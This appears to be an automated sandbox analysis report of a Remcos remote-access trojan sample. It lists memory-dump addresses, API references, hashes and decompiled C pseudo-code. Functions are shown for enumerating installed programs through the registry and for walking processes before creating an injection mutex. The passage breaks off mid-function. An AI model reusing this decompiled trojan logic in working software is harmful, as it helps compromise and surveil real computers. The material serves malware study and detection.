                                    0x0070f5eb
                                    0x0070f5f0
                                    0x0070f60e
                                    0x0070f618
                                    0x0070f61b
                                    0x0070f62e
                                    0x0070f631
                                    0x0070f63f
                                    0x0070f642
                                    0x0070f650
                                    0x0070f653
                                    0x0070f664
                                    0x0070f667
                                    0x0070f66a
                                    0x0070f66f
                                    0x0070f675
                                    0x0070f8c9
                                    0x0070f8cc
                                    0x0070f8d4
                                    0x0070f8dc
                                    0x0070f8e4
                                    0x0070f8ee
                                    0x0070f8ee
                                    0x00000000
                                    0x0070f69e
                                    0x0070f69e
                                    0x0070f6a0
                                    0x0070f6a0
                                    0x0070f6a3
                                    0x0070f6a4
                                    0x0070f6ba
                                    0x00000000
                                    0x00000000
                                    0x0070f6c0
                                    0x0070f6c3
                                    0x0070f6c6
                                    0x00000000
                                    0x00000000
                                    0x0070f6d3
                                    0x0070f6d6
                                    0x0070f6d9
                                    0x0070f6f6
                                    0x0070f6fb
                                    0x0070f6fe
                                    0x0070f700
                                    0x00000000
                                    0x00000000
                                    0x0070f71a
                                    0x0070f72a
                                    0x0070f72f
                                    0x0070f734
                                    0x00000000
                                    0x00000000
                                    0x0070f73e
                                    0x0070f76b
                                    0x0070f781
                                    0x0070f784
                                    0x0070f789
                                    0x0070f78e
                                    0x00000000
                                    0x00000000
                                    0x0070f794
                                    0x0070f799
                                    0x0070f79f
                                    0x0070f7a2
                                    0x0070f7a5
                                    0x0070f7a8
                                    0x0070f7ab
                                    0x0070f7ae
                                    0x0070f7b5
                                    0x0070f7b8
                                    0x0070f7bb
                                    0x0070f7bd
                                    0x0070f7c3
                                    0x0070f7c6
                                    0x0070f7c8
                                    0x0070f80a
                                    0x0070f80c
                                    0x0070f815
                                    0x0070f81a
                                    0x0070f81d
                                    0x0070f827
                                    0x0070f829
                                    0x0070f82c
                                    0x0070f82e
                                    0x0070f837
                                    0x0070f839
                                    0x0070f83b
                                    0x0070f83c
                                    0x0070f847
                                    0x0070f84c
                                    0x0070f850
                                    0x0070f85e
                                    0x0070f871
                                    0x0070f87f
                                    0x0070f88a
                                    0x0070f88f
                                    0x0070f850
                                    0x0070f892
                                    0x0070f895
                                    0x0070f89b
                                    0x0070f8a4
                                    0x0070f8a9
                                    0x0070f8b2
                                    0x0070f8bb
                                    0x0070f8c4
                                    0x0070f8ef
                                    0x0070f8f2
                                    0x00000000
                                    0x0070f7cf
                                    0x0070f7cf
                                    0x0070f7d2
                                    0x0070f7d2
                                    0x0070f7d6
                                    0x00000000
                                    0x00000000
                                    0x0070f7d8
                                    0x0070f7e1
                                    0x0070f7ff
                                    0x0070f7ff
                                    0x0070f805
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0070f805
                                    0x0070f7e9
                                    0x0070f7ec
                                    0x0070f7f1
                                    0x0070f7f2
                                    0x0070f7f5
                                    0x0070f7fb
                                    0x00000000
                                    0x0070f7ec
                                    0x00000000
                                    0x0070f807
                                    0x0070f745
                                    0x0070f745
                                    0x0070f748
                                    0x0070f748
                                    0x0070f74c
                                    0x00000000
                                    0x00000000
                                    0x0070f74e
                                    0x0070f752
                                    0x0070f75f
                                    0x0070f757
                                    0x0070f75b
                                    0x0070f75b
                                    0x0070f75c
                                    0x0070f75c
                                    0x0070f763
                                    0x0070f766
                                    0x0070f769
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0070f769
                                    0x00000000
                                    0x0070f748
                                    0x0070f73e
                                    0x0070f675
                                    0x0070f5fe
                                    0x0070f603
                                    0x0070f608
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: d9de9d37a81c9cd778f8a57a44993f542afde609fbb027abba27ed1a8e79a042
                                    • Instruction ID: 528267ccdad0940fd60f2a9f0cb4382ad672b9430d9d41addff7ec4051ed697d
                                    • Opcode Fuzzy Hash: d9de9d37a81c9cd778f8a57a44993f542afde609fbb027abba27ed1a8e79a042
                                    • Instruction Fuzzy Hash: 29B18F71900309EFDB219F78C885BEEBBF4BF08300F144179E595A76D2DB79A8859B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E7C05, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E006E7C05(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E006D1F6D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E006E09BF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E006E09BF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E006E09BF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E006E09BF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E006E09BF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E006E09BF( &_v88, _v8);
								__eflags = E006D9DB5();
								if(__eflags == 0) {
									E006D3311(E006D30A6(_t129,  &_v208, E006D30A6(_t129,  &_v232, E006D4429(_t129,  &_v256, E006D30A6(_t129,  &_v280, E006D4429(_t129,  &_v304, E006D30A6(_t129,  &_v328, E006D4429(_t129,  &_v352, E006D30A6(_t129,  &_v376, E006D4429(_t129,  &_v400, E006D30A6(_t129,  &_v424, E006D4429(_t129,  &_v448, E006D7514( &_v472,  &_v40, __eflags, 0x7359c4), __eflags,  &_v160), _t206, __eflags, 0x7359c4), __eflags,  &_v112), _t206, __eflags, 0x7359c4), __eflags,  &_v184), _t206, __eflags, 0x7359c4), __eflags,  &_v136), _t206, __eflags, 0x7359c4), __eflags,  &_v88), _t206, __eflags, 0x7359c4), _t206, __eflags, "\n"));
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
								}
								RegCloseKey(_v8);
								E006D1EF0();
								E006D1EF0();
								E006D1EF0();
								E006D1EF0();
								E006D1EF0();
								E006D1EF0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E006D331A(_t129, _t207, __eflags,  &_v64);
					E006D1EF0();
				} else {
					E006D427F(__ebx, _t207, 0x72f724);
				}
				return _t207;
			}
































                                    0x006e7c05
                                    0x006e7c25
                                    0x006e7c2f
                                    0x006e7c45
                                    0x006e7c4c
                                    0x006e7c4e
                                    0x006e7c58
                                    0x006e7c59
                                    0x006e7c5a
                                    0x006e7c5b
                                    0x006e7c5c
                                    0x006e7c63
                                    0x006e7c64
                                    0x006e7ed8
                                    0x006e7edb
                                    0x006e7ee1
                                    0x006e7ee6
                                    0x00000000
                                    0x00000000
                                    0x006e7c6a
                                    0x006e7c6c
                                    0x006e7ebe
                                    0x006e7ebe
                                    0x006e7ebe
                                    0x006e7ebf
                                    0x006e7c72
                                    0x006e7c87
                                    0x006e7c8d
                                    0x006e7c8f
                                    0x006e7ca0
                                    0x006e7cae
                                    0x006e7cb5
                                    0x006e7cc3
                                    0x006e7cca
                                    0x006e7cd8
                                    0x006e7cdf
                                    0x006e7cea
                                    0x006e7cf1
                                    0x006e7cfc
                                    0x006e7d03
                                    0x006e7d11
                                    0x006e7d13
                                    0x006e7df3
                                    0x006e7dfe
                                    0x006e7e09
                                    0x006e7e14
                                    0x006e7e1f
                                    0x006e7e2a
                                    0x006e7e35
                                    0x006e7e40
                                    0x006e7e4b
                                    0x006e7e56
                                    0x006e7e61
                                    0x006e7e6c
                                    0x006e7e77
                                    0x006e7e77
                                    0x006e7e7f
                                    0x006e7e88
                                    0x006e7e90
                                    0x006e7e9b
                                    0x006e7ea6
                                    0x006e7eb1
                                    0x006e7eb9
                                    0x00000000
                                    0x006e7eb9
                                    0x006e7c8f
                                    0x006e7ec6
                                    0x006e7ec8
                                    0x006e7ec9
                                    0x006e7eca
                                    0x006e7ecb
                                    0x006e7ecf
                                    0x006e7ed6
                                    0x006e7ed7
                                    0x006e7ed7
                                    0x006e7eef
                                    0x006e7efb
                                    0x006e7f03
                                    0x006e7c31
                                    0x006e7c38
                                    0x006e7c38
                                    0x006e7f0f

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 006E7C27
                                    • RegEnumKeyExA.ADVAPI32 ref: 006E7EDB
                                    • RegCloseKey.ADVAPI32(?), ref: 006E7EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 6a47208fe257f0dd467a00e33911a7a903acc3e41bdf01c72302e798478e3972
                                    • Instruction ID: 958d3012b0c2dc191f13729c139359da32fa794bbc7b0eb775ff72c5e1db474f
                                    • Opcode Fuzzy Hash: 6a47208fe257f0dd467a00e33911a7a903acc3e41bdf01c72302e798478e3972
                                    • Instruction Fuzzy Hash: 69813271D04158ABDB64EBA0ED52EEEB37BAF50300F1041AEE816A6252EF705F45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00719546, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00719546(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x73a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E007101F5(_t46);
							E00718782( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E007101F5(_t47);
							E00718C3C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E007101F5( *((intOrPtr*)(_t74 + 0x7c)));
						E007101F5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E007101F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E007101F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E007101F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E007101F5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E007196B9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x73a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E007101F5(_t31);
							E007101F5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E007101F5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E007101F5(_t74);
			}















                                    0x0071954e
                                    0x00719552
                                    0x0071955a
                                    0x00719563
                                    0x00719568
                                    0x0071956f
                                    0x00719577
                                    0x0071957f
                                    0x0071958a
                                    0x00719590
                                    0x00719591
                                    0x00719599
                                    0x007195a1
                                    0x007195ac
                                    0x007195b2
                                    0x007195b6
                                    0x007195c1
                                    0x007195c7
                                    0x00719568
                                    0x007195c8
                                    0x007195d0
                                    0x007195e3
                                    0x007195f6
                                    0x00719604
                                    0x0071960f
                                    0x00719614
                                    0x0071961d
                                    0x00719625
                                    0x00719626
                                    0x0071962c
                                    0x0071962f
                                    0x00719632
                                    0x00719639
                                    0x0071963b
                                    0x0071963f
                                    0x00719647
                                    0x0071964e
                                    0x00719654
                                    0x00719655
                                    0x00719655
                                    0x0071965c
                                    0x0071965e
                                    0x00719663
                                    0x0071966b
                                    0x00719670
                                    0x00719671
                                    0x00719671
                                    0x00719674
                                    0x00719677
                                    0x0071967a
                                    0x0071967d
                                    0x0071967d
                                    0x0071968f

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0071958A
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071879F
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187B1
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187C3
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187D5
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187E7
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187F9
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071880B
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071881D
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071882F
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718841
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718853
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718865
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718877
                                    • _free.LIBCMT ref: 0071957F
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 007195A1
                                    • _free.LIBCMT ref: 007195B6
                                    • _free.LIBCMT ref: 007195C1
                                    • _free.LIBCMT ref: 007195E3
                                    • _free.LIBCMT ref: 007195F6
                                    • _free.LIBCMT ref: 00719604
                                    • _free.LIBCMT ref: 0071960F
                                    • _free.LIBCMT ref: 00719647
                                    • _free.LIBCMT ref: 0071964E
                                    • _free.LIBCMT ref: 0071966B
                                    • _free.LIBCMT ref: 00719683
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: aec16b5fdfdb84c59967bd0702af118d627579930d2c6790275f901fd2c91985
                                    • Instruction ID: 57a009a594a9f51d1dfa4252a8f8cb1dd781e9d455bc898ea6d03ad3bcba0f2f
                                    • Opcode Fuzzy Hash: aec16b5fdfdb84c59967bd0702af118d627579930d2c6790275f901fd2c91985
                                    • Instruction Fuzzy Hash: 5E317831600209EEEB21AA3CD849BDA73E9AF00350F104429E649E71D1DE7DEDD69B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 105DA3B9, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E105DA3B9(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E105D1068(_t46);
							E105D95F5( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E105D1068(_t47);
							L105D9AAF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E105D1068( *((intOrPtr*)(_t74 + 0x7c)));
						E105D1068( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E105D1068( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E105D1068( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E105D1068( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E105D1068( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E105DA52C( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E105D1068(_t31);
							E105D1068( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E105D1068(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E105D1068(_t74);
			}















                                    0x105da3c1
                                    0x105da3c5
                                    0x105da3cd
                                    0x105da3d6
                                    0x105da3db
                                    0x105da3e2
                                    0x105da3ea
                                    0x105da3f2
                                    0x105da3fd
                                    0x105da403
                                    0x105da404
                                    0x105da40c
                                    0x105da414
                                    0x105da41f
                                    0x105da425
                                    0x105da429
                                    0x105da434
                                    0x105da43a
                                    0x105da3db
                                    0x105da43b
                                    0x105da443
                                    0x105da456
                                    0x105da469
                                    0x105da477
                                    0x105da482
                                    0x105da487
                                    0x105da490
                                    0x105da498
                                    0x105da499
                                    0x105da499
                                    0x105da49f
                                    0x105da4a2
                                    0x105da4a2
                                    0x105da4a5
                                    0x105da4ac
                                    0x105da4ae
                                    0x105da4b2
                                    0x105da4ba
                                    0x105da4c1
                                    0x105da4c7
                                    0x105da4c8
                                    0x105da4c8
                                    0x105da4cf
                                    0x105da4d1
                                    0x105da4d6
                                    0x105da4de
                                    0x105da4e3
                                    0x105da4e4
                                    0x105da4e4
                                    0x105da4e7
                                    0x105da4ea
                                    0x105da4ed
                                    0x105da4f0
                                    0x105da4f0
                                    0x105da502

                                    APIs
                                    • _free.LIBCMT ref: 105DA3F2
                                    • ___free_lconv_mon.LIBCMT ref: 105DA3FD
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9612
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9624
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9636
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9648
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D965A
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D966C
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D967E
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9690
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96A2
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96B4
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96C6
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96D8
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96EA
                                    • _free.LIBCMT ref: 105DA414
                                    • _free.LIBCMT ref: 105DA429
                                    • _free.LIBCMT ref: 105DA434
                                    • _free.LIBCMT ref: 105DA456
                                    • _free.LIBCMT ref: 105DA469
                                    • _free.LIBCMT ref: 105DA477
                                    • _free.LIBCMT ref: 105DA482
                                    • _free.LIBCMT ref: 105DA4BA
                                    • _free.LIBCMT ref: 105DA4C1
                                    • _free.LIBCMT ref: 105DA4DE
                                    • _free.LIBCMT ref: 105DA4F6
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _free$___free_lconv_mon
                                    • String ID:
                                    • API String ID: 3658870901-0
                                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction ID: 97a125569a78fb572539959a746e9932db5aa00dd58332f6447a08c8cdd70d4a
                                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction Fuzzy Hash: CE315731600B45AFEB20AA3DD84DB4BBBE8EF40290F51842BE449D6350DFB5BD85CB25
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DCE44, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186processsynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 97%
                                    			E006DCE44(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E006D7744("1") != 0) {
					L14:
					E006D1EFA( &_a4, _t149, _t159, E006E6E1B(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					E006D1EF0();
					if(E006E7614(_t111) != 0) {
						_push(_t111);
						if(E006DD4AF( &_a4, L"Program Files\\") != 0xffffffff) {
							E006DD4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(E006DEAE5( &_v1204,  &_a4) != 0) {
						L22:
						E006D1EF0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E006D20D5(_t106,  &_v96);
						E006E79DC(E006D1EEB(0x73c500),  &_v96);
						E006D1F95( &_v96);
						if(E006E432B(E006D1EEB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E006E0BB0(0x73c518, E006D1F95(0x73c518), "Inj", 1);
						}
						E006D1FC7();
						goto L22;
					}
				}
				E006D1F6D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E006D427F(_t106,  &_v56,  &_v648);
					_t157 = E006D230A( &_v56,  &_v60);
					_t159 = E006D22CD( &_v56,  &_v64);
					E006D8226( &_v72,  *((intOrPtr*)(E006D230A( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(E006D9EAC( &_a4) != 0) {
						E006D1EFA( &_v32, _v676, _t159, E006E7678( &_v120, _v676));
						E006D1EF0();
						if(E006D7744( &_v1204) == 0) {
							_t149 = 0x72f724;
							if(E006D7744(0x72f724) != 0 || E006E7642(_v676) != 0) {
								E006D1EF0();
								L13:
								E006D1EF0();
								goto L14;
							} else {
								E006D9E56( &_v32);
								E006D1EF0();
								break;
							}
						}
						E006D1EF0();
						E006D1EF0();
						goto L22;
					}
					E006D1EF0();
				}
				CloseHandle(_v8);
				_t149 = 0x72f724;
				if(E006D7744(0x72f724) != 0) {
					goto L13;
				}
				E006D1EF0();
				goto L18;
			}
























                                    0x006dce5c
                                    0x006dce5f
                                    0x006dce65
                                    0x006dce74
                                    0x006dcfd5
                                    0x006dcfe1
                                    0x006dcfe6
                                    0x006dcfe9
                                    0x006dcff5
                                    0x006dcff7
                                    0x006dd008
                                    0x006dd015
                                    0x006dd015
                                    0x006dd008
                                    0x006dd02a
                                    0x006dd0a4
                                    0x006dd0a7
                                    0x006dd0b4
                                    0x006dd02c
                                    0x006dd02c
                                    0x006dd03d
                                    0x006dd03f
                                    0x006dd053
                                    0x006dd05b
                                    0x006dd075
                                    0x006dd096
                                    0x006dd077
                                    0x006dd07e
                                    0x006dd08c
                                    0x006dd092
                                    0x006dd09f
                                    0x00000000
                                    0x006dd09f
                                    0x006dd02a
                                    0x006dce7d
                                    0x006dce85
                                    0x006dce91
                                    0x006dce96
                                    0x006dcea0
                                    0x006dcf07
                                    0x006dceb2
                                    0x006dcec3
                                    0x006dced1
                                    0x006dcee8
                                    0x006dceed
                                    0x006dcefd
                                    0x006dcf58
                                    0x006dcf60
                                    0x006dcf75
                                    0x006dcf8c
                                    0x006dcf9b
                                    0x006dcfc8
                                    0x006dcfd0
                                    0x006dcfd0
                                    0x00000000
                                    0x006dcfac
                                    0x006dcfb3
                                    0x006dcfbb
                                    0x00000000
                                    0x006dcfbb
                                    0x006dcf9b
                                    0x006dcf7a
                                    0x006dcf82
                                    0x00000000
                                    0x006dcf82
                                    0x006dcf02
                                    0x006dcf02
                                    0x006dcf1e
                                    0x006dcf24
                                    0x006dcf36
                                    0x00000000
                                    0x00000000
                                    0x006dcf3c
                                    0x00000000

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0073C578,00000000,00000001), ref: 006DCE5F
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006DCE85
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006DCEA0
                                    • Process32NextW.KERNEL32(006DC873,0000022C), ref: 006DCF11
                                    • CloseHandle.KERNEL32(006DC873,?,00000000,?,?,?), ref: 006DCF1E
                                    • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 006DD034
                                    • CloseHandle.KERNEL32(00000000), ref: 006DD096
                                      • Part of subcall function 006E7678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 006E768D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                    • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                    • API String ID: 193334293-694575909
                                    • Opcode ID: 8d3d556dd6d1af76461fc363481045c8ceb1f4ee5059706bf77637d5d63b9e12
                                    • Instruction ID: 39e3fbd3bf72a42c42710e35730a706e183420ceb89388d4644e49fcf13d4970
                                    • Opcode Fuzzy Hash: 8d3d556dd6d1af76461fc363481045c8ceb1f4ee5059706bf77637d5d63b9e12
                                    • Instruction Fuzzy Hash: 6A616030D00209ABCF54FFA0E8969EDB77BAF51344F10416EF81667292EF745E0ACA58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00718880, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 97%
                                    			E00718880(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
